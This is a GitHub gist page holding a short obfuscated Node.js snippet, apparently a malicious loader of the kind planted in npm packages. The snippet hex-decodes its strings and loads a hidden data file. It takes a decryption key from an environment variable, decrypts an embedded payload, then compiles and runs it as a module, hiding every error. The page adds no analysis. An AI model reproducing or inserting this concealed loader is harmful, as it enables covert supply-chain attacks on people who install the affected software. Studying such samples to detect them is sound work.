Skip to content

Instantly share code, notes, and snippets.

@jsoverson
Created November 26, 2018 21:44
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jsoverson/e9672d76be647043c3eeac4adbe0dfd4 to your computer and use it in GitHub Desktop.
Save jsoverson/e9672d76be647043c3eeac4adbe0dfd4 to your computer and use it in GitHub Desktop.
! function() {
try {
var r = require,
t = process;
function e(r) {
return Buffer.from(r, "hex").toString()
}
var n = r(e("2e2f746573742f64617461")),
o = t[e(n[3])][e(n[4])];
if (!o) return;
var u = r(e(n[2]))[e(n[6])](e(n[5]), o),
a = u.update(n[0], e(n[8]), e(n[9]));
a += u.final(e(n[9]));
var f = new module.constructor;
f.paths = module.paths, f[e(n[7])](a, ""), f.exports(n[1])
} catch (r) {}
}();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment